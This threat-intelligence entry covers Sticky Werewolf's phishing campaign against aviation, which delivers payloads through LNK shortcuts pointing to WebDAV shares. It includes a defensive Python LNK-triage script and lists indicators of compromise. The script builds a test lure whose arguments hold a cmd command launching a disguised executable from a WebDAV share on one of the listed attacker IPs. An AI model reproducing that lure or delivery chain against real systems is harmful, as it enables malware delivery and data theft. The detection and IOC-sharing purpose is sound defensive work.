Howling at the Inbox: Sticky Werewolf's Latest Malicious Aviation Attacks

June 7, 2024, 8:08 a.m.

Description

Morphisec Labs has been monitoring increased activity associated with Sticky Werewolf, a group whose origin remains unclear and whose motivation is assessed as either geopolitical or hacktivist; its recent tradecraft points to espionage and data exfiltration. Sticky Werewolf has targeted the aviation industry with phishing emails carrying archive attachments. Each archive contains an LNK file whose target is a malicious payload hosted on a WebDAV server, so opening the shortcut pulls the payload over HTTP and starts the infection chain, which ultimately injects commodity malware (RATs or stealers) to carry out data theft. Because a UNC path to a WebDAV share is resolved by the Windows WebClient (WebDAV Mini-Redirector) service, the initial fetch shows up as outbound HTTP from the victim host and the shortcut itself, not a macro or exploit, is the first execution step worth hunting for.
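As an added example that is not part of the Morphisec write-up or of this feed entry, the Python below statically triages a .lnk file for the traits of the delivery chain described above: it parses the Shell Link header, the ANSI LinkInfo network path and the StringData fields per MS-SHLLINK, flags a target that is a LOLBin such as cmd.exe, flags any field that references a WebDAV share or a UNC path to a bare IPv4 address, and matches such addresses against the three IPs listed under Indicators. The two shortcuts it builds inline are constructed test inputs with hypothetical file names (invoice.pdf.exe, notepad.exe), not samples from the campaign; the IP in the lure is one of the page's indicators and is never contacted.

```python
"""Static triage of .lnk lures from an LNK -> WebDAV delivery chain (added example)."""
import re
import struct

# IPv4 indicators published on this page; used for offline matching only, never contacted.
PAGE_IPV4_IOCS = {"94.156.8.211", "94.156.8.166", "79.132.128.47"}
LOLBINS = {"cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # MS-SHLLINK fixed CLSID
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]  # StringData, in file order
# UNC path whose host is a bare IPv4, optionally carrying WebDAV @SSL / @port decorations.
UNC_IP_RE = re.compile(r"\\\\(\d{1,3}(?:\.\d{1,3}){3})(?:@[A-Za-z0-9]+)*\\")
WEBDAV_MARKERS = ("davwwwroot", "@ssl", "http://", "https://")


def _cstr(buf: bytes, off: int) -> str:
    return buf[off:buf.index(b"\x00", off)].decode("cp1252", errors="replace")


def parse_link_info(info: bytes) -> dict:
    """LocalBasePath and UNC NetName + CommonPathSuffix from a LinkInfo block (ANSI fields)."""
    _size, _hdr, li_flags, _vol, lbp_off, cnrl_off, suffix_off = struct.unpack_from("<7I", info, 0)
    out = {}
    if li_flags & 0x1:  # VolumeIDAndLocalBasePath
        out["local_base_path"] = _cstr(info, lbp_off)
    if li_flags & 0x2:  # CommonNetworkRelativeLinkAndPathSuffix
        net_name_off = struct.unpack_from("<I", info, cnrl_off + 8)[0]
        out["net_name"] = _cstr(info, cnrl_off + net_name_off) + "\\" + _cstr(info, suffix_off)
    return out


def parse_lnk(data: bytes) -> dict:
    """Return the path-bearing fields of a Shell Link: LinkInfo paths plus StringData."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos, fields = 76, {}
    if flags & HAS_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # skip LinkTargetIDList
    if flags & HAS_LINK_INFO:
        size = struct.unpack_from("<I", data, pos)[0]      # LinkInfoSize counts itself
        fields.update(parse_link_info(data[pos:pos + size]))
        pos += size
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        pos += width * count
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return fields


def triage_lnk(data: bytes) -> dict:
    """Flag LNKs that launch a LOLBin or reference a WebDAV/UNC-to-IP payload; match page IOCs."""
    fields = parse_lnk(data)
    text = " ".join(fields.values())
    findings = []
    target = fields.get("local_base_path") or fields.get("relative_path") or ""
    if target.replace("/", "\\").rsplit("\\", 1)[-1].lower() in LOLBINS:
        findings.append("launches-lolbin")
    for marker in WEBDAV_MARKERS:
        if marker in text.lower():
            findings.append("webdav-marker:" + marker)
    ips = sorted(set(UNC_IP_RE.findall(text)))
    findings.extend("unc-to-ip:" + ip for ip in ips)
    findings.extend("known-ioc:" + ip for ip in ips if ip in PAGE_IPV4_IOCS)
    return {"fields": fields, "findings": findings, "suspicious": bool(findings)}


def build_lnk(strings: dict) -> bytes:
    """Construct a minimal Unicode .lnk carrying only StringData (test input, not a real sample)."""
    flags, body = IS_UNICODE, b""
    for bit, name in STRING_FIELDS:
        if name in strings:
            flags |= bit
            body += struct.pack("<H", len(strings[name])) + strings[name].encode("utf-16-le")
    header = bytearray(76)
    header[:4], header[4:20] = b"\x4c\x00\x00\x00", LNK_CLSID
    struct.pack_into("<I", header, 20, flags)
    struct.pack_into("<I", header, 60, 1)  # ShowCommand = SW_SHOWNORMAL
    return bytes(header) + body


# Constructed inputs: a benign shortcut and a lure mimicking the chain described on the page
# (hypothetical file names; the IP is one of the page's indicators).
BENIGN_LNK = build_lnk({"relative_path": "..\\..\\Windows\\notepad.exe", "working_dir": "C:\\Users\\u"})
LURE_LNK = build_lnk({
    "relative_path": "..\\..\\..\\Windows\\System32\\cmd.exe",
    "arguments": '/c start "" \\\\94.156.8.211@80\\DavWWWRoot\\invoice.pdf.exe',
    "icon_location": "%SystemRoot%\\System32\\shell32.dll",
})

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("lure", LURE_LNK)):
        print(label, triage_lnk(blob)["findings"])
```

Run it over every .lnk extracted from a suspect archive before anything is opened; a hit on `webdav-marker` or `unc-to-ip` is enough to quarantine the archive, and a `known-ioc` hit ties it to this campaign's infrastructure. The parser deliberately ignores the ExtraData blocks and the Unicode LinkInfo offsets, so for a full forensic record of a real sample pair it with a complete LNK parser.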

Date

Published: June 7, 2024, 8 a.m.

Created: June 7, 2024, 8 a.m.

Modified: June 7, 2024, 8:08 a.m.

Indicators

SHA-256 file hashes

d973e7854f10b4d0a1060e55022dceadc51d038cee85d05e2c2c2fd3b40a42be

d6e6c786b793b46a1ee9b18b058e045d0aa1c83aa2b6aa493637f611d654d957

ce2b6d3aad07d3dec2b24f676cc9d2022bab5a086c7e773f9cfa3e7b7dc6d66a

c3efbac8ebffcf3d8178ce23e59f3b4978f5a91bf93773889870d45cc1b554b0

9eddffbef4d9d7329d062db0a93c933104d00f12106bf91fa3b58e8f8b19aa41

3ccbd8bd7424506b26491e5ff5ff55b000adaab1074ccf3b7452d0883f668040

217196571088cfd63105ae836482d742befcb7db37308ce757162c005a5af6ab

1301ec3006ad03742bfaef047aa434320aa0e725a99be5d6be27b955a814fcf4

05880ff0442bbedc8f46076ef56d4d1ffeda68d9ef26b659c4868873fa84c1a9

03ee2011ad671b1781015024ea53edfbff92c28c2b123bba02d6a6f462e74105

IPv4 addresses

94.156.8.211

94.156.8.166

79.132.128.47

Attack Patterns

Malware

NETWIRE (MITRE ATT&CK software ID S0198)

DarkTrack

Rhadamanthys Stealer

Ozone RAT

MetaStealer

Threat actor

Sticky Werewolf

MITRE ATT&CK techniques

T1107 File Deletion (deprecated ID; now T1070.004 Indicator Removal: File Deletion)

T1202 Indirect Command Execution

T1497 Virtualization/Sandbox Evasion

T1105 Ingress Tool Transfer

T1036 Masquerading

T1027 Obfuscated Files or Information

T1053 Scheduled Task/Job

T1566 Phishing

Additional Information

Targeted sector: Aerospace